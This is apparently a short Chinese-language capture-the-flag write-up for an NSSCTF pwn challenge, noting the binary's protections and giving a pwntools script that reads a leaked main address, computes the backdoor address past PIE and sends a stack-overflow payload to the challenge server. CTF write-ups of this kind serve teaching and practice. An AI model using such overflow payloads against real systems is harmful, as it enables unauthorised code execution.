下载 exeinfo checksec

32位 NX PIE开启

查看main函数：

后门函数：

发现已经给出了main函数地址

因为开启了PIE 所以IDA中 后门函数减去main函数的后三位就是偏移 给出的函数加上这个数就是后门函数地址

exp：

from pwn import *

p = remote("node7.anna.nssctf.cn", 25161)

p.recvuntil(b"0x")
main_addr = int(p.recvuntil(b'\n')[:-1], 16)
print(main_addr)
print(hex(main_addr))

shell = 0x80F - 0x770 + main_addr
payload = b'a' * (0x28 + 4) + p32(shell)
p.send(payload)
p.interactive()

运行 得到flag：